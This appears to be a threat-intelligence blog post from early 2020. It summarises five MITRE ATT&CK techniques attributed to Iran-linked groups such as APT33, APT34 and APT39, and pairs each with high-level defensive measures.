TOP 5 ATT&CK techniques used by Threat Actors tied to Iran
On the 3rd of January 2020, the Iranian Major General Qasem Soleimani was killed in a US drone strike ordered by President Donald Trump at Baghdad International Airport. Since then, popular demonstrations and military responses have been seen coming from Iran. It’s important to remember, however, that wars and military actions have potential to also be carried out in cyberspace nowadays, though sometimes such responses are not easy to spot. False flags and strong anonymity measures can be used to make attribution of cyberattacks more and more difficult.
Hacktivist activities such as defacements, social network account takeovers or DDoS attacks are common in these situations. High-impact cyberattacks targeting critical infrastructure or otherwise causing chaos might be too obvious and easy attributable to Iran even without evidence, so it is unlikely that there will be any attacks like that at this moment. However, more sophisticated intelligence and strategic operations targeting key US government assets, people and organizations in order to spy and gain insights into the US’s next moves are more likely. Such operations would also be more difficult to spot and attribute to Iran.
There are several advanced threat actor groups potentially tied to the Iranian government which have been performing operations in the past few years, like APT33, OilRig / APT34, APT39, Leafminer and MuddyWater, among others. We track their activities thanks to our Threat Context module:
After researching these and other groups with potential links to Iran, we have complemented the tactics, techniques and procedures (TTPs) outlined in the MITRE ATT&CK framework with insights from our own investigations, resulting in a list of the TOP5 techniques used by these groups. These techniques are not the only techniques used by these attackers, but they are the most frequently employed.
- T1193 – Spearphishing Attachment: Spearphishing is one of the most popular techniques used to gain Initial Access by advanced actors. In this case, groups like APT39, DarkHydrus and OilRig / APT34 have used the technique, using social engineering and attaching mostly Office and PDF documents to their malicious emails. This technique is usually tied to T1204 – User Execution, because the victim is needed to open the malicious document. Some groups tied to Iran have also made use of T1189 – Drive-by Compromise, which does not need any action from the user other than visiting a specific website.
- Protection:
- Automatic e-mail analysis to detect and stop malicious attachments
- Threat Intelligence services and feeds to support detection activities
- Employee education and awareness
- Protection:
- T1086 – PowerShell: This is another technique widely used by various kinds of cybercriminals and malware nowadays. PowerShell is present by default in modern Windows installations, so attackers make use of it to perform specific actions like downloading and installing malware or changing system configurations. Actors like CopyKittens use PowerShell Empire, which permits full control of the infected machines in an easy way.
- Protection:
- Consider uninstalling PowerShell from systems if possible
- Implement proper security policies to avoid certain PowerShell actions
- Protection:
- T1078 – Valid Accounts: As we detail in our report about The Credential Theft Ecosystem, a single compromised valid account can be the door that leads to the full compromise of an organization. Threat actors tied to Iran such as APT33, APT39 or OilRig/APT34 have used valid accounts for Initial Access, Privilege Escalation and Lateral Movement.
- Protection:
- Good password policies that force frequent password changes and disallow password reuse could be a way to mitigate this risk
- Threat Intelligence services to detect credentials leaks/theft and support the detection of malware infections which could steal credentials
- Employee education and awareness
- Protection:
- T1003 – Credential Dumping: Once threat actors have access to compromised systems, a common behavior is to try to get all the credentials they can from the machines in order to move laterally or access the systems easily. Attackers originating from Iran have used tools like mimikatz or ProcDump to accomplish this task.
- Protection:
- The detection of tools used to perform this technique could help to avoid the dumping of credentials
- Minimize the number of credentials stored in plain text (or easy to decrypt/decode formats) in RAM, registry or the file system.
- Protection:
- T1105 – Remote File Copy: This is probably one of the techniques most widely used in advanced attacker intrusions. It is quite common to see threat actors copying tools and additional malware from their controlled servers onto the victims’ systems in order to support lateral movement. Iranian attackers are no exception, and they also use this technique in their activities.
- Protection:
- Network traffic analysis to detect anomalies in the incoming and outgoing traffic.
- Threat Intelligence services and feeds to support the detection of network activity against those malicious servers.
- Protection:
The use of these techniques is not limited to threat groups dedicated to espionage or advancing a nation-state’s interest; most are also employed by financially-motivated cybercriminals. For this reason, protecting against these TTPs is critical not just for organizations that are more likely to be targeted by nation-states such as Iran but also for organizations which can be a target for advanced cybercriminal groups like Trickbot Group, Dridex Groups, Cobalt Gang and the likes of them.